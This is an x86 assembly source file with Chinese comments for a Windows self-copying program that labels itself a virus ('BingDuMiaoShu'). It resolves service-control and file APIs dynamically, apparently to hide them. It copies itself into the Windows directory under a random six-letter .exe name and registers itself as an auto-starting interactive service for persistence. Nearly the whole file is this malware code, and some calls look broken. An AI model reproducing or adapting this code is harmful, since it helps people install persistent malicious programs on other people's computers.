. 386

.model flat , stdcall

option casemap : none

 

include        windows.inc

include        user 32. inc

includelib        user 32. lib

include kernel 32. inc

includelib        kernel 32. lib

 

; - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - 函数名称 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

.const

sz 11        db        "程序已经在windows目录下了" , 0

sz 22        db        "标题" , 0

szUnlockService        db        "UnlockServiceDatabase" , 0

szExe        db        "\%c%c%c%c%c%c.exe" , 0

szTest        db        ".Test1" , 0

szCunMang        db        ".CunMang1" , 0

szMiaoShu        db        "BingDuMiaoShu" , 0

 

 

szGetModuleFileName        db        "GetModuleFileNameA" , 0

szGetWindowsDirectory        db        "GetWindowsDirectoryA" , 0

szCopyFile        db        "CopyFileA" , 0

 

 

szOpenSCM        db        "OpenSCManagerA" , 0

szCloseServiceHandle        db        "CloseServiceHandle" , 0

szStartService        db        "StartServiceA" , 0

 

szChangeService        db        "ChangeServiceConfig2A" , 0

 

szAdvapi 32        db "ADVAPI32.DLL" , 0

 

szCreateService        db        "CreateServiceA" , 0

szGetTickCount        db        "GetTickCount" , 0

szKernel        db        "kernel32.dll" , 0

szLockService        db        "LockServiceDatabase" , 0

 

; - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - 函数地址 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

. data

 

szFileName        db        128 dup ( ? )        ;当前路径

szWindowDirect        db        128 dup ( ? )        ;windows目录路径

szNullFileName        db        128 dup ( ? )        ;windows目录路径，这个加上了exe

szMuBiaoName        db        128 dup ( ? )        ;清 0 的内存

 

szTime        dd        1

szExeBuffer        db        128 dup        ( ? )

HandleData        dd        ?

HandleCreateService        dd        ?

szLocalService 1        dd        ?

 

addrKernel        dd        ?

addrGetModuleFileName        dd        ?

addrGetWindowsDirectory        dd        ?

addrCopyFile        dd        ?

 

addrAdv        dd        ?

addrOpenSCM        dd        ?

addrOpenService        dd        ?

addrCreateService        dd        ?

addrCloseServiceHandle        dd        ?

addrLockService        dd        ?

addrUnlockService        dd        ?

addrChangeService        dd        ?

addrStartService        dd        ?

addrGetTickCount        dd        ?

 

 

; - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - 代码段 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

.code

 

_SuanFa proc  szVar

push esi

 

call addrGetTickCount

mov  esi , eax        ;时间的返回值

 

mov  eax , szTime

imul eax , eax , 343 FDh

add  eax , 269 EC 3 h

mov  szTime , eax        ;变量的值改变

sar  eax , 10 h

and  eax , 7 FFFh

 

add  eax , 3 h        ;eax的值也改变

xor  edx , edx        ;高位是 0  因为除以的是 32 位数值

imul eax , esi        ;esi是原来时间函数的返回值，这里与算法后的eax想乘

div  szVar

pop  esi

mov  eax , edx        ;余数返回给eax

 

ret

_SuanFa endp

 

start :

; - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = 这是ADVAPI 32. DLL中的敏感函数 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -

push offset szAdvapi 32

call LoadLibrary

mov  addrAdv , eax        ;得到ADVAPI 32. dll

 

push offset szOpenSCM

push addrAdv

call GetProcAddress        ;得到OpenSCManager

mov  addrOpenSCM , eax

 

push offset szCloseServiceHandle

push addrAdv

call GetProcAddress        ;得到CloseService

mov  addrCloseServiceHandle , eax

 

push offset szStartService

push addrAdv

call GetProcAddress

mov  addrStartService , eax        ;得到StartService

 

push offset szLockService

push addrAdv

call GetProcAddress

mov addrLockService , eax        ;得到LockService

 

push offset szUnlockService

push addrAdv

call GetProcAddress

mov addrUnlockService , eax        ;得到UnlockServiceDatabase

 

push offset szChangeService

push addrAdv

call GetProcAddress

mov  addrChangeService , eax        ;得到ChangeServiceConfig 2 A

 

push offset szCreateService

push addrAdv

call GetProcAddress

mov addrCreateService , eax        ;得到CreateService

 

 

; - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = 这是kernel 32 中的敏感函数 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -

push offset szKernel

call GetModuleHandle

mov  addrKernel , eax        ;得到kernel 32 的句柄

 

push offset szGetModuleFileName

push addrKernel

call GetProcAddress

mov  addrGetModuleFileName , eax        ;得到GetModuleFile

 

push offset szGetWindowsDirectory

push addrKernel

call GetProcAddress

mov  addrGetWindowsDirectory , eax ;得到GetWindowsDirectory

 

push offset szCopyFile

push addrKernel

call GetProcAddress

mov  addrCopyFile , eax ;得到CopyFile

 

push offset szGetTickCount

push addrKernel

call GetProcAddress

mov addrGetTickCount , eax        ;得到GetTickCount

 

push 128

push offset szFileName

push NULL

call addrGetModuleFileName        ;返回值是名字的长度，名称已经放到了缓冲区

 

push 128

push offset szWindowDirect

call addrGetWindowsDirectory        ;得到windoes目录，如果是system 32 则是GetSystemDirectory

 

push 128

push offset szNullFileName

call addrGetWindowsDirectory        ;再次得到windows目录

 

mov edi , offset szWindowDirect        ;比较字符串中的内容

mov ebx , edi

mov ecx , 128 ;比较FFFF  FFFF次

mov al , 0        ;比较的字符是 0

cld

repne scasb        ;当CX = 0  或者 ZF = 1 就退出循环

sub edi , ebx        ;此时edi就是字符长度

sub edi , 1        ;减去字符串结尾的 0

 

mov ecx , edi

mov esi , offset szFileName        ;源字符串

mov edi , offset szWindowDirect        ;目的字符串

 

 

 

s :        mov al , [esi]

mov bl , [edi]

cmp al , bl

jnz WindowsName        ;如果不在windows目录下，就开始复制到windows下面了

inc esi

inc edi

loop s

jmp  _Service        ;能走到这一步，代表已经比较完了，字符串肯定相等，就开始服务了

 

 

WindowsName :        ;如果已经在windows目录下了，就进行设置服务函数

 

push 1 Ah

call _SuanFa

mov  ecx , 1 Ah

push 61 h

pop  edi

add  eax , edi

push eax        ;第一个字符

 

push 1 Ah

call _SuanFa

mov  ecx , 1 Ah

add  eax , edi

push eax        ;第二个字符

 

push 1 Ah

call _SuanFa

mov  ecx , 1 Ah

add  eax , edi

push eax        ;第三个字符

 

push 1 Ah

call _SuanFa

mov  ecx , 1 Ah

add  eax , edi

push eax        ;第四个字符

 

push 1 Ah

call _SuanFa

mov  ecx , 1 Ah

add  eax , edi

push eax        ;第五个字符

 

push 1 Ah

call _SuanFa

mov  ecx , 1 Ah

add  eax , edi

push eax        ;第六个字符

 

push  offset szExe

push  offset szExeBuffer

call  wsprintf

 

invoke lstrcat , offset szNullFileName , offset szExeBuffer

push TRUE

push offset szNullFileName

push offset szFileName

call addrCopyFile        ;开始复制

 

invoke RtlMoveMemory , offset szFileName , offset szMuBiaoName , 120        ;内存清零

invoke RtlMoveMemory , offset szFileName , offset szNullFileName , 120        ;填充新的路径

 

invoke MessageBox , NULL , offset szNullFileName , offset szWindowDirect , MB_OK

 

jmp Windows

 

 

 

_Service :        invoke MessageBox , NULL , offset sz 11 , offset sz 22 , MB_OK

 

Windows : 

push SC_MANAGER_ALL_ACCESS        ;OD中这个显示的是数值F 003 F，那么肯定有朋友要知道我是怎么知道这个宏的，很简单，载入IDA，右键Use Stadard Symbolic....

push NULL        ;如果该指针为NULL ，该ServicesActive数据库默认情况下打开。

push NULL        ;如果该指针为NULL ，或者如果它指向一个空字符串，函数连接到服务控制管理器在本地计算机上。

call addrOpenSCM        ;函数建立了一个连接到服务控制管理器，并打开指定的数据库。

 

mov HandleData , eax        ;如果函数成功，返回值是一个句柄指定的服务控制管理器数据库

mov edi , eax        ;先保存起来，因为参数需要eax

xor ebx , ebx

cmp edi , ebx        ;测试返回值

jz  _exit

 

mov eax , ebx

mov ebx , eax

xor ebx , ebx

 

push ebx

push ebx

push ebx

push ebx

push ebx

push offset szFileName

push SERVICE_ERROR_NORMAL

push SERVICE_AUTO_START

push SERVICE_WIN 32 _OWN_PROCESS or SERVICE_INTERACTIVE_PROCESS

push SERVICE_ALL_ACCESS

push offset szCunMang

push offset szTest

push edi

call addrCreateService        ;创建一个服务对象并且把它加入到服务管理数据库中

 

mov HandleCreateService , eax        ;保存句柄

 

push edi

call addrLockService        ;锁定数据库

mov  szLocalService 1 , eax

 

push offset szMiaoShu

push 1

push 0

call addrChangeService

 

push szLocalService 1

call addrUnlockService

 

push 0

push 0

push 0

call addrStartService

_exit :        

 

 

invoke ExitProcess , NULL

 

end start